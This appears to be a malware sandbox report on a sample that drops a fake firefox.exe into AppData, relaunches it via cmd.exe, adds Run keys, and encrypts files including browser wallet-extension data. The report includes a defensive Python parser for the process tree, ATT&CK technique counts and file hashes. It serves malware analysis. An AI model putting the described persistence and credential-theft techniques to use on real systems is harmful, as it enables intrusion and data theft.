[2] PID 25460  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 25508  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 25540  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 25588  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
[2] PID 25624  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 25672  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
[2] PID 25704  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 25812  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        [4] PID 25844  dw20.exe -x -s 728  (image: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe)
            - Checks processor information in registry
            - Enumerates system info in registry
            (dw20.exe is the .NET Framework's Watson error-reporting client; appearing as a child of firefox.exe, it shows that this instance of the dropped binary terminated with an unhandled exception rather than running to completion.)
The remaining depth-1 entries are Windows shell components with no parent in the recorded tree, not descendants of the sample:

[1] PID 4560  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    - Modifies registry class
    - Suspicious use of SetWindowsHookE
    - Suspicious use of SetWindowsHookEx
[1] PID 4044  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[1] PID 6304  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
[1] PID 26200  "dwm.exe"  (image: C:\Windows\system32\dwm.exe)
    - Checks SCSI registry key(s)
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
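The tree above repeats one pattern forty times in this section alone: cmd.exe /c relaunches the dropped %APPDATA%\Frfx\firefox.exe, and most of those children re-add a Run key and register a clipboard-format listener. The Python below is an added example, not code from the sandbox or from the sample's authors. It parses an abridged excerpt of the process tree in the page's raw export form (image path, command line, depth glyph and PID run together on one line, which is what a copy of the report gives you), rebuilds parent/child links from the depth glyphs, and reports the relaunch loop, how many children set persistence or clipboard flags, and any instance that spawned the .NET error-reporting client dw20.exe. The excerpt, the flag strings and the single-digit depth assumption come from this report; the launch threshold is an assumption.

```python
"""Parse a sandbox process tree as the report page exports it and flag the
cmd.exe /c <dropped exe> relaunch loop plus crashed instances."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed, abridged excerpt of this report's tree in raw export form: image
# path and command line fused, a one-digit depth glyph "N⤵", PID inline or on a
# later "PID:" line, flags as "- " bullets, bare "-" lines as separators.
SAMPLE_TREE = r"""
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10860
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:21552
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21584
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21632
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:25704
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵PID:25812
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 7284⤵
- Checks processor information in registry
PID:25844
-
"""

# Depth is one digit: that is what splits "dw20.exe -x -s 728" from depth 4 in "7284⤵".
HEADER = re.compile(r"^(?P<image>[A-Za-z]:\\\S+?\.exe)(?P<cmdline>.*?)(?P<depth>\d)⤵(?:PID:(?P<pid>\d+))?\s*$")
PID_LINE = re.compile(r"^PID:\d+$")
APPDATA_EXE = re.compile(r"/c\s+(\S*\\AppData\\(?:Roaming|Local)\\\S+\.exe)", re.I)


@dataclass
class Proc:
    image: str
    cmdline: str
    depth: int
    pid: Optional[int] = None
    flags: List[str] = field(default_factory=list)
    parent: Optional["Proc"] = field(default=None, repr=False)   # repr=False avoids a cycle
    children: List["Proc"] = field(default_factory=list, repr=False)


def parse_tree(text):
    """Rebuild parent/child links from the depth glyphs; processes come back in page order."""
    procs, stack, cur = [], [], None            # stack[i]: latest process seen at depth i+1
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":
            continue
        m = HEADER.match(line)
        if m:
            cur = Proc(m["image"], m["cmdline"].strip(), int(m["depth"]), int(m["pid"]) if m["pid"] else None)
            del stack[cur.depth - 1:]               # pop siblings and anything deeper
            if stack:
                cur.parent = stack[-1]
                stack[-1].children.append(cur)
            stack.append(cur)
            procs.append(cur)
        elif PID_LINE.match(line) and cur is not None:
            cur.pid = int(line[4:])
        elif line.startswith("- ") and cur is not None:
            cur.flags.append(line[2:])
    return procs


def find_relaunch_loops(procs, min_launches=2):
    """Group cmd.exe /c launches of an executable under AppData by target and count
    how many spawned children set a Run key or registered a clipboard listener."""
    groups = {}
    for p in procs:
        m = APPDATA_EXE.search(p.cmdline) if p.image.lower().endswith("\\cmd.exe") else None
        if not m:
            continue
        g = groups.setdefault(m[1].lower(), {"launches": 0, "run_key": 0, "clipboard": 0, "child_pids": []})
        g["launches"] += 1
        for c in p.children:
            if c.image.lower() == m[1].lower():
                g["child_pids"].append(c.pid)
                g["run_key"] += int(any(f.startswith("Adds Run key") for f in c.flags))
                g["clipboard"] += int(any("AddClipboardFormatListener" in f for f in c.flags))
    return {t: g for t, g in groups.items() if g["launches"] >= min_launches}


def find_crash_reporters(procs):
    """(parent_pid, dw20_pid) pairs: dw20.exe is the .NET Watson client, so its parent
    died with an unhandled exception."""
    return [(p.parent.pid, p.pid) for p in procs
            if p.parent is not None and p.image.lower().endswith("\\dw20.exe")]


if __name__ == "__main__":
    tree = parse_tree(SAMPLE_TREE)
    print(find_relaunch_loops(tree))
    print("crashed instances (parent pid, dw20 pid):", find_crash_reporters(tree))
```

Run against the full tree, the same parser gives the per-launch flag counts for the whole section; the depth-first stack handling is what keeps a depth-4 child attached to the right depth-3 parent even though the export carries no explicit parent PIDs.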
Network
MITRE ATT&CK Enterprise v16
(counts as reported by the sandbox; sub-techniques are indented under their parent technique)

Execution
- Command and Scripting Interpreter (3)
  - JavaScript (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
- Windows Management Instrumentation (1)

Persistence
- Boot or Logon Autostart Execution (3)
  - Active Setup (1)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (3)
  - Windows Service (3)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)

Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (3)
  - Active Setup (1)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (3)
  - Windows Service (3)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)

Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (4)
  - Disable or Modify System Firewall (1)
  - Disable or Modify Tools (3)
- Indicator Removal (1)
  - File Deletion (1)
- Modify Registry (9)

Credential Access
- Credentials from Password Stores (2)
  - Credentials from Web Browsers (1)
  - Windows Credential Manager (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Downloads
(path not shown)
  Filesize: 16B
  MD5: da5a094000b37a4e04a465c6d6bbc293
  SHA1: b4b879462fc2d90910afe5af37a933324c5f86a9
  SHA256: 4d66bafcea9fe79a33b3d91b6a4236618789539c9d7630b4b118a8e96e198701
  SHA512: 9446492ca0f55a9571794c2792f6dc18dee4857b282d1c0aac7569dbd56455b8d424cc801e2eb9245cfc93b228fad2dfcabc762a532e98f2a695d649b293f7eb

C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.encrypt
  Filesize: 140KB
  MD5: 2c77adefdfbe014fb62ad974049e828f
  SHA1: e48c2312c4295c844288ea6c402f9386cc51d11a
  SHA256: 989e46ef8aff059a4e973b4383e0e41d154247b2b1e25f2633f9633bdebe2d7a
  SHA512: 4df2888e33f80049324985b9f04fafd3e3be07cdc57ae77bd1ca33dfb5be3c7c68d2ec3a73139520439360fa59b069a4f2ca4e01e84e07feb2a4615be44434d6

C:\ProgramData\Package Cache\{9F51D16B-42E8-4A4A-8228-75045541A2AE}v56.64.8781\dotnet-host-7.0.16-win-x64.msi.encrypt
  Filesize: 744KB
  MD5: 56deaccc2392ca238d60ecc3b0d27664
  SHA1: 6a1626d090dd8ca269b709da6610b9a5b8efbaba
  SHA256: 9771b44185ded8d4314162961987cf7ad35430e33f1e5e4d4ead580556835b96
  SHA512: a31403259c5969ba05518c1a01c9cc3e0c8356f060912f5e39939789cb7809fd3cc87feea17300f3491244f6ebd151f6c4b0f4d6f8fe45ee3b736b3f2fc4f2d8

(path not shown)
  Filesize: 3.0MB
  MD5: 407d7e7876d5be15bfeaf54f51e8c9cd
  SHA1: b0c6a52e8df06e27db7c90c7c1fda5f155c1d337
  SHA256: 03ce645063d5ad0975947b0cbe1ba75ac1801ab8ff59c94ffa3375f82d19d50a
  SHA512: 3c37cdd7567aed4f5ba4a1f9b53ef3433c5e0a42e9eb981812d4af8cb56f6d57f6c8a5431dcab9d1dc7b1c73b78f6175855cd000dbe5cab864bf9c19749321db

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT.encrypt
  Filesize: 32B
  MD5: f3237bbe4306bedad354bbf5e034422f
  SHA1: e741ddd0f9bebc1f0f92156a29588b9ff5bcb22b
  SHA256: 197092afe4b83735abe4527dabcdb1611a8e6b3aab6c315192fa7d77aa588471
  SHA512: df68c6780e88874c3ad0f99d4b3b907bec2ffb245079ac56161e3a6448cc4ca772d4a22506544eb6cd53560d9f612089895f2a70e4bfc96ea36e831f7c7b71c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001.encrypt
  Filesize: 48B
  MD5: f1ac3ec81b83a43c30d0fd9e35244660
  SHA1: c306d03a18837fe7fe77b2a8a8f6b0097f678b6d
  SHA256: ab6aba16cdfe80c6bfd3ddca1c1f5bd3ebcae37b281d9334f7a2e972d88347c7
  SHA512: 9be08613a568f133022bf7d1f48fb0db3a2581f82bd6288d210fc2f14088bf2ba105695aa775a2a25650bff5dbeee30122578d5549f555fdba6bd095922af93d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index.encrypt
  Filesize: 32B
  MD5: e9cd4ab7c97ea4c5ebc296eb9055e144
  SHA1: 3ad5a9b9358208b3df0d0a5a3d46cb516d19bdf7
  SHA256: 77c2858bc280859278e5f4b9d9900ecdc401875e7e1e09d444dc603aef758eff
  SHA512: 328e77fdb94cbd5a783cc751a05973f01ec87aba08fadc06deba7728f0e5ca3b5d214d6c8304f79a3899126c1a676e4d478691ce9fd408db8206769f2ce72947

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_0.encrypt
  Filesize: 8KB
  MD5: 2c4fbecf0640659ddc7777d9257ebec2
  SHA1: 0c19240e9425f9c5063a764d0cba9b98af746426
  SHA256: 1218414192aa4deead487810dc61ae28faf482b675c75fd59a27dfdca46bd40c
  SHA512: 4e20ee85f88f49538ced3c368e93c1e26867c4f22891a1af2b9f6080911e69b8d0bebc77918b16f4c35d4ba310a2ae548bc0c738c44c7ee3659b4706ebe0c4ff

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_1.encrypt
  Filesize: 264KB
  MD5: 10ed2063cf25b63857d7f135e7ee9711
  SHA1: 9b86e518fdd6cf3b6d7903fbce9471a19da9bc84
  SHA256: f72c4b75fbc3f81c4a3b0051e34ffacd011e40c3180b2d5c937adc62669bdd2f
  SHA512: 8bc93d2de3cca4532a0360e99bc6877aae6126baedb88aa7cf43b14bb5065fcd276d419d5d779cf839e2819d0d1419d867faffbbc707d971ba6f6763993d88a2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_2.encrypt
  Filesize: 8KB
  MD5: c6be081dec773f94cc72e044da310ad8
  SHA1: ed83425cc57ed4a4d5b4bafbe7f7f71dd4485348
  SHA256: a728b5540892ca6abf4cf0fadf7c1f367881b49cdbbc537263dd5d99e2c66a1c
  SHA512: f609f42c4a030533f0e8fe7896413a02ef8ae0575f63c39d2cbee9807a84e4b105116bb9debb6bc2b695cacb1186ad3002243abbd8b10d261c7ed7b2a60e7117

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_3.encrypt
  Filesize: 8KB
  MD5: 0f07325043818b3c8dc717cce36ead70
  SHA1: b8897c8b7467894eda1b693560890aa62ed9fbaf
  SHA256: bb2e1fa07ece8650c688f5a1fd5208c94687329b8515776a6403d74e9695598a
  SHA512: 706b6d30695fab17c3d6adf314a1e3606b842bbfb67f7a8c1656ed4140086fe8c40c303aa82a014e2ffab1852d515508bacee0c2c5f4952a809d50ef16f00d6a
(path not shown)
  Filesize: 280B
  MD5: aa9afd16e8041e8c80250b50ea6899e4
  SHA1: a3a698d431952253255c343f2b35f74e73e63088
  SHA256: 2bd7f856d73f78bc3a4de32b447b21babad42c009b19fcebe2f8cdeca2380926
  SHA512: 344de0888df8851d957ca6fab055eb9e2f1aa6d958022c2c30442cd6aad4d158d0a99f8908184abc60fb1e0ccdd3d9395d8c0d37fc317d3700974c3348d4a5ff

(path not shown)
  Filesize: 352B
  MD5: 950c4dc65b3ce1822f957569307e46e2
  SHA1: 7735cb185bafdc04650731375c711d5affe613ae
  SHA256: 9496a3f03f7d36f1b9b4a15e6a5e91f347794a7798550f15faefe2ee0ffbc75c
  SHA512: 0dc2d7394030c298d357867a5307c4c65a7c3eb237024c035a257dc6882537a57d1225c73256977d8058ac8d50c2796e555e8ca0d6f5ecf7e3b84a41cd34cec4

(path not shown)
  Filesize: 331B
  MD5: df3b6429621d2095fda81be95755e9a5
  SHA1: f0a3bd4bfbc8fab0996a9baa773a3eb247a4d738
  SHA256: c58398b0305ae08ff9f95196d64eab0febb5b1dd5d083f6b85ea39b36ab4e632
  SHA512: e04517c4d6bb1d99f34055c41f2800579d8aaf0b63e48b3c253df9ca9479ec4ab8e6c5e9f95dfd60cdb2c0ecbc396dfdbda6d752cc1a42b29d9c975c9ca4afd4

(path not shown)
  Filesize: 384B
  MD5: 87cfa534d6c8606300b861523a62462f
  SHA1: 2d9d1e4c86687d9d1c17e59f8c6bdd8724aa8a2b
  SHA256: 389d0755f233b2233d26bd4290bc2a3cf799435f8c237fac58a48b0da7d79c74
  SHA512: 22771f4fb07fce8013a9cefc2850c5efb5ec2152df15078ebb9c6426332bbdabab3025f27639efae67d85fb7b6d5eb9a4565c14c6d5bce06c617a1a7d59c19cb

(path not shown)
  Filesize: 211KB
  MD5: 63f12f93bb48b941fff69c46719067d3
  SHA1: dfd7a4322b3c8cc05df62689088ea64e644d0996
  SHA256: 52489132b344860bef97cdfaf8bb2e20c11c9924f11567cd021f77488afd164f
  SHA512: 056f169c83594074fea4832230a043f60d1df422e2f9d0dd80585e098ba9a4883db03900c2f004634669cab004130e9eec152845f0aaa5bd70ff25ca93ee7e92

(path not shown)
  Filesize: 55KB
  MD5: a5045af58ba9e9915d288536a24a7ff0
  SHA1: 1e49d86360ef29d6099b0d33089e7f024ad1d4d8
  SHA256: b287474ffd57c38bc1dc843cd053bdc3408cc399eb132f30918c8cb152263da5
  SHA512: 4a819eb0e1367d2f61b2151deefb7f71b28841873edf70de1e3fb6030f6f32899ee1e4aac804e2293723f86c9fb111ff1845a60888dc8f343605417902f949a5

(path not shown)
  Filesize: 38KB
  MD5: 661aadab70ecc81d1eeb60ecd2f476da
  SHA1: 8680e320b8f132c9aed285f31b4421c6968dba36
  SHA256: 31597241b0d1dd67ae5cbfaf6ea6cdef7352798f53cf11559376677a5d14b6dd
  SHA512: a8a0c759138cfebf324a70a677ac17c0568a509e4fb5b6108b5f9d353d972ef22f70e2a260768825b62dd16d28acf30dd4fee03ed115697f16eee6a9ee996006

(path not shown)
  Filesize: 34KB
  MD5: d5311606e44c38667e6d7d5ee72d02bf
  SHA1: 6146ca7d1265ab5c81d22ebc6193b85bc690a56b
  SHA256: 925ebef57b78e5450509f6b2789034ce27a11c60fe8dab2bcf7616d06fcdf1d4
  SHA512: 5741c3daa0dabbff64b7f60f8a42a7c1a24d1b3f8a5811864b4aea6305b3576fc1016bd8ddb579795a7e088048e603f617f7ad697b1ded783580703b670b05e0

(path not shown)
  Filesize: 38KB
  MD5: bc60deb3c0273dc1fcb96748b86b2302
  SHA1: 960a5e4c41504a6f3b078e90be539ef0e0eb8559
  SHA256: 631d382e3a0c3efaff4cedb1ddbf6d55ff983e745d8f7b64077ca858645a7b64
  SHA512: 3853e8f5fd2dd3a5c6ac68bd1de6ec0bb627086eea2c1bb94d9ef97be63976906bcd7646ded25e1dc681a7b1b77267f5b7605af4b35911e10f8a8323f277a8d0

(path not shown)
  Filesize: 119KB
  MD5: b78c208c87201efefbde1b05e311fe3f
  SHA1: 438bab4f023ecbc7d3d136b01966930823587804
  SHA256: f6c6a469101626531293f2a4c594e86f5b8a620b9d351278d10b061e6b2b62fa
  SHA512: 09dd8ee68af111edebc0826a1de3bb525607828c97c377da2098522c2218bcbcbdf2eac6f58296409100a5985770f524fe5ce53fed3f6baa119b0c0eeebe1720

(path not shown)
  Filesize: 144KB
  MD5: 99fe785469af3a2158d055557553dbaa
  SHA1: bed205f0208ce76c4bc23dfec01a8358e5ac2358
  SHA256: 719d53b7bfbe95b9ac69fc4f725f3f2b95d4bea514017f156bdf83651a61e76c
  SHA512: d51231a4b0c41558fd2d08ded4ead473c3258932eac4ef3ee9c7a06d8353e1cbe2202e0f7d24e110c1d36e40615292e2ac8fc0218b5b0e6d0242a9cbbc6df519

(path not shown)
  Filesize: 203KB
  MD5: 95557604f5c940528a96a3f222ed447b
  SHA1: d71a1f8ac521bf512534775989e2954a8ae1e30e
  SHA256: cec305b4818eb5f1d329e5caab68572f55167832c41c9e2db4e56b13b228c549
  SHA512: b84cd0ca86afac23fb94ed5f2efc4cb465fdd016f457c0882bcb76d40927c49c4f9a21fdc575cf1f9094e858b0dcac6d4762f8aa90aff1a144757a4ddfb209db

(path not shown)
  Filesize: 174KB
  MD5: 21f277f6116e70f60e75b5f3cdb5ad35
  SHA1: 8ad28612e051b29f15335aaa10b58d082df616a9
  SHA256: 1537b0c18a7facad4bdfa9ae3ec84095c91467aa5cfc1d8af2724909703c2fe4
  SHA512: e619f92b1ec91e467e4b11d5ad25c99b62c7216f9da81c159ae0c9ef3f9e75f48dde7bad09ee38727b5a14b827f3b813c196504057708cbfaf4bc67dbd032816

(path not shown)
  Filesize: 229KB
  MD5: c6334512044b038e1299c4edd3654bb7
  SHA1: 490f7cd5c7fdd875227c49344de31a2ca58f9335
  SHA256: 3724e559397032d8851ed76802b57fe479e56925d63e5d760aff536b9249df47
  SHA512: b4c9d98a802525ee82dd8a0de6f07fc77c0243f7d001aca5d54b2ec71325119be45aa4e1ef5d1d035d6237ea9dcf2c976fa170550942c50b568326157d7bfd7e

(path not shown)
  Filesize: 589KB
  MD5: b15fe82b3220751c7563df73e9e6fbc8
  SHA1: 5933edf186e8595438ab8a830b863b65e35e9e37
  SHA256: 709b480ac69bf8352991fa0483d563e132cc5806429e3eaed8c3848a2b1bdd9e
  SHA512: c520ec05edf481dfac365bb075d516db056f076e55a8c298a20879e519a14050578950c1c784126e62aaa3592b42d4b3b91bb76c0e6e0fafddc21fa4d754919e

(path not shown)
  Filesize: 3KB
  MD5: 2ed0f58e220935f25e28db0a29704bc0
  SHA1: 5a413c9f550d1ab33663b453f6360812fbd6aeba
  SHA256: 17b8c8803840cf5ff34259ab74ed653eaf63375634a5f01fccd6ed8f54b12a49
  SHA512: 2263fba1aab57c3f6d716c990db545446e53aee20cd5ddda6e0c047680decd0da853ab0bde4dba5689a1acab6516ba267ca6b6e91001083cdad864d8408d4e2c
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 3KB
  MD5: 07de94c73ca9b933572e9919235057d9
  SHA1: c1c078891c4bc18918973ca142369f85205df660
  SHA256: 3691d94c0d1d7f8cbceec545c1ef1b15febdd633ce40a2eb508bde3f1e0bb072
  SHA512: f506244bb7e369304e40d145b64bcd58afdd2af71ef42b8e8352c94b27090e03b33b7d9412e395d8a2e541946855243d9f3b4537715298a133101708ba28d125

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 3KB
  MD5: f2a7cb9791cef6840bfeefc42702f055
  SHA1: 3e418666bbd8860e9c37a40116c3f08d17768208
  SHA256: 10fc35fd6aa458f26ec52ce8e35544827be7874c37ead4af635568a72ab289ad
  SHA512: 91f58b80ec9c8a9ba130201653f0b0fcb66a8b842bc58be6e7fa6b63d84f3b25c71bed19dc4f308680ae7bc0f5759dfee5cb436fe75aaf767dfb1d4808393509

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57dc95.TMP
  Filesize: 3KB
  MD5: 5fc9f0fb5aa728f21d468284d4ce057b
  SHA1: f1c87d7eb85204be9f6d502538027c98e5ae3b2f
  SHA256: ef5e76862005ac087821f4b514514c06e4f358108702b36bcab67239c7a13ce2
  SHA512: 378ddb43feeafab381dad3cd7e1081a083b9b2fdbc67dee5e169292e65d8b588c48f70bf62d5756843d0455fdc169a626c1139b7322533eea86c0b0c19ba61ef

(path not shown)
  Filesize: 2B
  MD5: 99914b932bd37a50b983c5e7c90ae93b
  SHA1: bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
  SHA256: 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
  SHA512: 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

(path not shown)
  Filesize: 107KB
  MD5: 2b66d93c82a06797cdfd9df96a09e74a
  SHA1: 5f7eb526ee8a0c519b5d86c845fea8afd15b0c28
  SHA256: d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954
  SHA512: 95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5

(path not shown)
  Filesize: 3KB
  MD5: 9eccd771c512e565f30a748cbf63efe2
  SHA1: 5f466bb228c99d11f1cdf1a417cba2c93ab7c6c3
  SHA256: f14a436f07aff3afb287fa0a6de932e929e73d6c7ff307689e8e583901eff078
  SHA512: 93a485d653c99b0998f5fd6583783df5e2967fcd6543418f9718bc52a10a2c6847e9fabe0578c6592e6e949c1df35d761d4a08263405eb3667b998349fe35aa6

(path not shown)
  Filesize: 3KB
  MD5: 43f389c2fcb4d0202bf03e6cfc210eed
  SHA1: 3f929a0ed5acffb12991374868839fbf0fbf8334
  SHA256: b712359dec62890937d7fa3d27947f908e89050f23a01b58e787630f4d13eb4a
  SHA512: 5e57704195d409175eb60c85884360daefa507ca6bccde73e6514d511b14e60fd2f4c9d05a18531698148bd8889037fa5655968ebc72ba2336f35bb49c478ade

(path not shown)
  Filesize: 3KB
  MD5: 74fa4573dcb40ce3e6e14974294afdec
  SHA1: c44827078607848896401ab40a8ff1d08c27c811
  SHA256: cdab4112195a44f785d9fb4a85271a6a5fd7c62ec07b5885316583d963c5372c
  SHA512: 43d49ed1332ad81a91db072f72dab5a70bb4eca29e101a70939b558625fa025c3f3f58cb3ccdc8f5cbc1384d9185c2446db706705cd656d8f9331961783ae0e4

(path not shown)
  Filesize: 3KB
  MD5: 8c6b49c21ae083572eaeecb02c0efee6
  SHA1: a8a18d42bcba0875093c35410ebad66d0cf1db16
  SHA256: 8d0d391911f5a947c6134f0637a7706291b81d713f1f572961ff0965734181d4
  SHA512: f1b55e0722b075d6b19144be55b9babcab06b67ece9c6d1fe367c15345bf249676d6023e13679b1bcd5df979bf1028d0329a49888eedd608bc7093f90684b812

(path not shown)
  Filesize: 3KB
  MD5: d8986c8a133637e62ffeeceb0a5847ec
  SHA1: 6d0e7779488a1c2914b28d9d047ac2e8777191ad
  SHA256: 4c2b770252f5b3c920c0bc251208894fde57f2b9eef3c9911b226189cd7763fb
  SHA512: 99e659d8ab6db109e6f9bcd64a52b9f9616fbfc95bfe7f8083f81e102c392d904ffe99f941556346bcc4703ca47a056b6a2dd828970298bad36477734fd522cc

(path not shown)
  Filesize: 3KB
  MD5: a6c3e6f20673997186d939508d2a216b
  SHA1: 6dfa98c97fb9939e544356de78cab5ffc1f405dd
  SHA256: 25ffbd929c8efc71b1ff2e1a121823f968ca4502426d4711eb5bfb7120e025a5
  SHA512: 2aee54336d7ca6f5ac5ae205174bd7596eacd15542cd0adc5544f89fddd6ffadf3baa9b13c233e7319a5d526be120ad406509467c83909c62f9736dc9a507afc

(path not shown)
  Filesize: 3KB
  MD5: be24f3fbf54e8b0bc9b453c5824064ea
  SHA1: ac0d13430ff46da8436911866a3bf3a438c8a2aa
  SHA256: d0dda3d7fbc525a867d6159c675fa5dec71483d5d8f37a5036687c9dbb3c3bb7
  SHA512: 1f1e47943b601ed725ea61c483e43a65091f53e3ceec704155a18e8ba2620b1abf5640c207e1ba107dbb2227cec95d5d6bd39940e2487413d84afe2d508c8a47

(path not shown)
  Filesize: 3KB
  MD5: 51aa699814de4e8f9cef6cb7f7b9953a
  SHA1: 43672443488363806d3562b84b25da1f2b98c2e4
  SHA256: 0a2d6d5479b708d750a2a009e3744c539e4d4eb5f05e6f77ff92e3ae9988a892
  SHA512: 764c23fe420684a95c2968a7ba3cd67c3df63eb6ff4d1c4298c819effa3e8db73758810d1ae96576ae14a18e4eade4adcb6711913c914e426f2c0d7750adb83f

(path not shown)
  Filesize: 3KB
  MD5: 80be741eea57be5f35838c6eb5448f23
  SHA1: 9973dca11e7e5bbbfbdb5aa30b174db3e91b36ed
  SHA256: d2beef110e45c24aadcb69551100adc28e8d9b18bc84766fadedec7d7855546f
  SHA512: 3de74966670e077eaae9c72f57d7b5546255d48713430690f20d096f82ffeecaaf5a24791502320c0699b34835e96325d292f7b6664dfe513424d224059671ce

(path not shown)
  Filesize: 3KB
  MD5: dce42dc3cf39635e92fb9d1a7d6043bd
  SHA1: 623827ff2e96ada51c90fffa42726398ecb2d302
  SHA256: 71f2f591ba4ab3a0aa88f38ad62f6b30b34f4188bd3ce9d6c36d44ea59fa45db
  SHA512: ca6a29a22152625d9dbd698fec12f4d46d169486919c611029d2677a6d9e2b1adb3b18878764e2ae43db9be5e89cc51f84e2a032449fa978f0506cca4b0d57c5

(path not shown)
  Filesize: 3KB
  MD5: 0f990f3f5d0ce0bc99202a75a53252d8
  SHA1: 0c79f0038c1176c1d4b2df80436e4bf49a35c005
  SHA256: 71a1aff9ea937b52e0cab766e500d73f535afc13f91cec3f3be6837566e487ee
  SHA512: 267f3879a705189f82ed8248dbcea25de2fc97cccd0e0d09fb56c56c9408c4ca60db055337895ebda970205ffdbd8332154388c9b58fcb5849547ad9c429e698
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RFe64da44.TMP
  Filesize: 3KB
  MD5: c2424c8465029cda8030f46f4915ab55
  SHA1: 77d60ce860c347e855219a5dc1ad053e9bfee30c
  SHA256: e348e92a90285a30b932fc76314cebaa7f0c550795fd6377a5b74bdfab31f728
  SHA512: 77dd5b5f0a1d98eeb46fc7a928733403673429854afbb271c43d4c052cc75746ecb958e5602b0ebacb4d6c0a1255e34ce20fcab85d87172969a0fe786c98242e

(path not shown)
  Filesize: 2B
  MD5: d751713988987e9331980363e24189ce
  SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
  SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
